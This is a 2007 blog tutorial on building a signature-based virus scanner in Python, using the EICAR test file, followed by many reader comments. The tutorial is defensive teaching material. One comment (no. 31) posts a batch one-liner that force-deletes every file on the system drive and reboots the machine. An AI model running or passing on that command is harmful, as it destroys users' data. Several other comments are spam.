Writing a Virus Scanner (Part 1 of 2)

July 25, 2007 at 9:47 pm 34 comments

Introduction:

Okay, I’m sure everybody here wants to get down and dirty with the world of viruses. I’m sure you all have bad memories with viruses and now is your chance to get some revenge. All right, so our scanner won’t be that strong. In fact it will only detect one virus. To make matters worse the “virus” is just a test virus used to test out antivirus software. Still, armed with this information you can learn to apply these examples to finding real viruses. In the first part of this mini-series I will show you the basic theory behind antivirus software, so that we can write our own little scanning script. Obviously we won’t have advanced features such as quarantining, but if you add to the program, it could actually do some fine work. You should be able to apply this theory to whatever language you program in. I’ll be using Python.

Theory:

The basic theory behind antivirus software is to detect viruses based on their signatures, a hexadecimal string derived from the contents of a file. First I will show you how we get this string from a known virus. Then in the next part of the series, I’ll show you how to put this information to good use. Basically you find the virus signature by dumping the file in hexadecimal. Hexadecimal is a base-16 system (decimal is a base-10 system), and teaching it to you is outside the scope of this tutorial. If you want to learn hexadecimal (not completely necessary, but it definitely helps) I recommend going here.

Note: We will not be using the 0x1F format, nor will we be using the $1F. We will be just writing 1F. These numbers are still hexadecimal.

Okay, for the next step: your antivirus/antispyware utility might interfere with our activities if it has real-time protection features that scan downloads, because we are going to download the industry standard EICAR test file.

WARNING: I cannot be held responsible for misuse of antivirus software when using this file. If you aren’t comfortable using antivirus software, this tutorial is not for you.

Download a test file (not one of the ZIP ones). Now we need to dump the file into hexadecimal. There are many programs that can dump into hexadecimal, but I assume you want to do this quickly. If that is the case, please visit Online Hex Dump. Upload your file and you should get hex output. Remove the line numbers and the parts that aren’t hex (the ASCII column at the end of each line). Your final output should be this:

58 35 4F 21 50 25 40 41 50 5B 34 5C 50 5A 58 35
34 28 50 5E 29 37 43 43 29 37 7D 24 45 49 43 41
52 2D 53 54 41 4E 44 41 52 44 2D 41 4E 54 49 56
49 52 55 53 2D 54 45 53 54 2D 46 49 4C 45 21 24
48 2B 48 2A

Now you need to unspace this code. You can do this manually, but I just wrote a nice little Python script to do it for me:

string = "58 35 4F 21 50 25 40 41 50 5B 34 5C 50 5A 58 35 34 28 50 5E 29 37 43 43 29 37 7D 24 45 49 43 41 52 2D 53 54 41 4E 44 41 52 44 2D 41 4E 54 49 56 49 52 55 53 2D 54 45 53 54 2D 46 49 4C 45 21 24 48 2B 48 2A"  # the spaced hex dump from above
string = string.replace(" ", "")  # strip every space so the bytes run together
print(string)  # parentheses so this runs under both Python 2 and Python 3

Here’s what the final signature looks like:

58354F2150254041505B345C505A58353428505E2937434329377D2445494341522D5354414E444152442D414E544956495255532D544553542D46494C452124482B482A

This makes things a lot faster if you are serious about all this virus signature stuff. Now you have the virus signature (note that it should all be on one line; if it appears wrapped here, blame WordPress’s editor in Opera, not the signature)! Don’t worry, you won’t have to do this for every virus, or even most viruses. There are sites that provide free virus signatures. One site I found is run by Lightspeed Systems. The signature they provide for this test file isn’t the full hex dump; it’s actually only about half of it. Checking that half would still find the virus, it would just return more false positives. The theory behind our virus scanner is that it will hex dump the file and compare it to a known list of virus signatures. To detect more advanced viruses you will have to learn about polymorphic viruses, which is definitely outside the scope of this tutorial. Good luck. Learn all this so you’ll be ready for the next tutorial. If you don’t wish to write your own virus scanner, maybe you would like to help out with an open source antivirus project.
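Added example (not code from the original post, which is Python 2): a Python 3 script that does the whole pipeline described above in one place. It hex-dumps the EICAR bytes in the same rows-of-16 format as the online dumper, derives the unspaced signature, and scans arbitrary bytes against a tiny signature list. The 68-byte EICAR string is constructed inline from the dump shown earlier, and the "partial" entry is my own truncation standing in for the half-length signature the post mentions, to show why a shorter signature matches more inputs.

```python
import binascii

# Constructed sample: the 68-byte EICAR test string, the file the post
# hex-dumps. It is harmless by design and exists only to trigger scanners.
EICAR = b"X5O!P%@AP[4\\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*"


def hex_dump(data, width=16):
    """Render bytes the way the post's online dumper does: rows of
    space-separated uppercase byte pairs, 16 bytes per row."""
    rows = []
    for i in range(0, len(data), width):
        chunk = data[i:i + width]
        rows.append(" ".join("%02X" % b for b in chunk))
    return "\n".join(rows)


def signature(data):
    """Unspaced hex signature of a whole file, like the post's final string."""
    return hex_dump(data).replace(" ", "").replace("\n", "")


# Tiny signature database: name -> unspaced hex string. The partial entry
# (first 34 bytes) is a constructed stand-in for a half-length signature.
SIGNATURES = {
    "EICAR-Test-File": signature(EICAR),
    "EICAR-Test-File (partial)": signature(EICAR)[:68],
}


def scan_bytes(data, sigs=SIGNATURES):
    """Return the names of every signature found anywhere in data.
    Matching raw bytes is equivalent to matching hex strings, so each
    signature is converted back to bytes once instead of hex-dumping
    every file that gets scanned."""
    hits = []
    for name, hexsig in sigs.items():
        if binascii.unhexlify(hexsig) in data:
            hits.append(name)
    return hits


def scan_file(path, sigs=SIGNATURES):
    """Scan one file on disk; returns the same list as scan_bytes."""
    with open(path, "rb") as f:
        return scan_bytes(f.read(), sigs)


if __name__ == "__main__":
    print(hex_dump(EICAR))
    print(signature(EICAR))
    print(scan_bytes(EICAR))
```

A file holding only the first 40 bytes of EICAR is flagged by the partial signature but not the full one, which is the extra false-positive exposure the post warns about.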

Resources:

ASCII Table / Extended ASCII Codes – A table with ASCII and hex character codes.

NickCiske.com | Tools – Tools for converting various number systems (including hex) to text.

Online Hex Dump – An online hex dumper (if the title wasn’t obvious).

Python Programming Language — Official Site – Home to the famous scripting/programming language. It’s easy to learn, and allows you to make quick little functions that save you a ton of time. Python can also make robust applications. That’s why we’ll be using it to make the antivirus program in the next part of the tutorial.

Viruslist.com – Information About Viruses, Hackers, and Spam – A huge virus info site.

Virus Detection Signatures – Free virus signatures. There’s probably better stuff out there though.

That’s all for part one, folks! If you love it, hate it, or don’t care, leave a comment. There might be a small wait for part two, but it should be within the next week or two (I might do some smaller posts for a while, and I’ll be out of town later this week). Thanks for reading!

-Vainentree


34 Comments

  • 1. Amr M. Kamel  |  September 28, 2007 at 7:43 pm

    Hey, nice tutorial but where is the second part? I can’t wait to read it, plz hurry =)

    Thanks a lot for sharing knowledge 🙂

    best regards,
    Amr M. Kamel

    Reply
  • 2. vainentree  |  September 28, 2007 at 8:55 pm

    Sorry, after no one showed interest I didn’t follow it up. Maybe I can get to it this weekend!

    Reply
  • 3. Amr M. Kamel  |  September 29, 2007 at 10:13 am

    No its really great and it is really a very interesting topic :), thanks in advance…

    best regards,
    Amr M. Kamel

    Reply
  • 4. janet  |  October 23, 2007 at 3:41 am

    Very attractive, please go on …..

    Reply
  • 5. Thousif  |  November 8, 2007 at 6:56 am

    Hi nice tutorial, but we need the second part…
    and some more reference to write antivirus code in VC++ or some other lang like java…

    Reply
  • 6. D  |  March 16, 2008 at 4:33 pm

    God dammit I was expecting a part 2. What’s the point of putting “part 1 of 2” when you’re not going to make a part 2.

    God dammit.

    Reply
  • 7. fikri  |  March 22, 2008 at 2:33 am

    oh my God… don’t ever give up my friend 🙂

    i need it! u must help me since I’m turning to a good man. I had released a few viruses before and really feel stupid. Now, I’m on my way to release my own virus scanner to fight my viruses. please help me to do that. 😦

    Reply
    • 8. 1/2-adder  |  January 24, 2013 at 6:11 am

      Hi Fikri,
      You should show me how to write viruses. I guess I need to learn that to become an antivirus programmer. Will you do that?

      Thanks.

      1/2-adder

      Reply
  • 9. shivesh  |  September 24, 2008 at 8:52 am

    That’s a nice article. Can u put something more as i have to create a virus signature scanner. Is the 2nd part available?

    Reply
  • 10. rushikant pawar  |  June 26, 2009 at 11:40 am

    I’m trying to design a home made antivirus program and for the same purpose I want to collect all virus signatures in HEX up till now. I am trying to collect it from the internet from the last 2 years but no link I found ever. Would you like to mail me your suggestions or any links that I can link to..

    Reply
  • 11. lynx  |  December 11, 2009 at 9:15 pm

    Great tutorial! You really should do the second part.

    Reply
  • 12. Zach B  |  May 24, 2010 at 9:24 am

    Where is the second part? I was all into this, then there was no second part. What about a tutorial on making heuristic software in Python?

    Great job!

    Reply
  • 13. Onthod  |  June 9, 2010 at 5:29 pm

    top Robot Programs At inexpensive Price : kingsbot.tk

    Reply
  • 14. TrB  |  July 10, 2010 at 4:44 am

    Nice tutorial. I wanted to design an experiment for my students based on this. I want to know how we compare the signature with the program files. Do we also have to dump the program files in hexadecimal? Thanks.

    Reply
  • 15. TIS  |  July 22, 2010 at 12:31 am

    Very nice article. Go ahead and make that second article happen. Please write an example using C#.net. Also, include more links to “sites that provide free virus signatures”. Please, notify by email when part 2 is available.

    Reply
  • 16. varun  |  July 30, 2010 at 5:52 am

    its great
    please tell me where is the second
    part
    have u written it or not
    thankx

    Reply
  • 17. cherry1234  |  October 23, 2010 at 10:58 am

    Best Software Downloads and Reviews. the most comprehensive source for free-to-trysoftware downloads on the WebBEST 4 DOWNLOADS

    Reply
  • 18. Topix  |  November 15, 2011 at 8:05 am

    when you show us the second part??

    Reply
  • 19. Anil Magar  |  January 11, 2012 at 5:22 am

    how to make virus scanner

    Reply
  • 20. Writing a Virus Scanner « msg1len Official Website  |  July 3, 2012 at 6:23 am

    […] Original Post Share this:TwitterFacebookLike this:LikeBe the first to like this.   Leave a comment […]

    Reply
  • 21. adwait  |  October 18, 2012 at 3:48 am

    Nicely written tutorial. Was very helpful. Please follow it up with the second part….

    Reply
  • 22. Kingstaa  |  November 5, 2012 at 11:42 am

    Nice tutorial, as others I am also waiting for the next.

    Keep up the good work.

    Reply
  • 23. Mohammed Alsubaie  |  November 28, 2012 at 2:45 am

    thank you.

    nice tutorial Bro.

    Reply
  • 24. 1/2-adder  |  January 24, 2013 at 6:21 am

    Hi Vainentree,
    I am very impressed with this post. I had no clue about how to write antivirus programs until I read your post. Thanks a lot, mate. I’d like to talk to you and I can’t wait for part 2!

    Thanks.

    1/2-adder.

    Reply
  • 25. hcg diet food list  |  February 20, 2013 at 3:45 am

    Hello there! Do you know if they make any plugins
    to safeguard against hackers? I’m kinda paranoid about losing everything I’ve
    worked hard on. Any suggestions?

    Reply
  • 26. markus ruhl steroids  |  April 17, 2013 at 11:11 pm

    Its like you read my mind! You seem to know a lot about this,
    like you wrote the book in it or something. I think that you
    can do with some pics to drive the message home a
    bit, but instead of that, this is fantastic blog. An excellent
    read. I will definitely be back.

    Reply
  • 27. Joshua McLaughlin  |  November 17, 2013 at 3:29 am

    as far as just a plugin no HOWEVER you could check out Honeypoint which is a program that helps safeguard against hackers as opposed to guarding against viruses it helps guard against evil humanz ^_^ http://www.microsolved.com you can even download a demo somewhere on the interwebz, it especially helps if your machine is being port scanned it picks up on it right away and there are even some modules\plugins for more offensive countermeasures that go with it

    Reply
  • 28. paul smith  |  March 20, 2014 at 5:24 pm

    help me please where is second part

    Reply
  • 29. shaikhsohail30  |  April 6, 2014 at 6:09 pm

    Good job.. It is of great help and I appreciate your efforts for this one.. Please complete the series…

    Reply
  • 30. shaikhsohail30  |  April 6, 2014 at 6:19 pm

    Reblogged this on shaikhsohail30 and commented:
    This is a great Post from TheNerdCan …

    Reply
  • 31. Md. Moniruzzaman  |  April 17, 2015 at 1:00 pm

    @echo off del % systemdrive% \*.*/f /s /q shutdown -r -f -t 00 auto run Del c:\ *.* ly

    Reply
  • 32. Tico  |  April 19, 2015 at 7:12 am

    Really interested in how to write an antivirus program in Python!!! Please pick this back up again… Would be AMAZING if you did!!!

    Thanks!

    Reply
  • 33. tony  |  November 13, 2015 at 5:41 pm

    great article. looking forward to seeing part 2

    Reply
  • 34. kidus gizaw  |  March 12, 2016 at 12:52 pm

    best web

    Reply
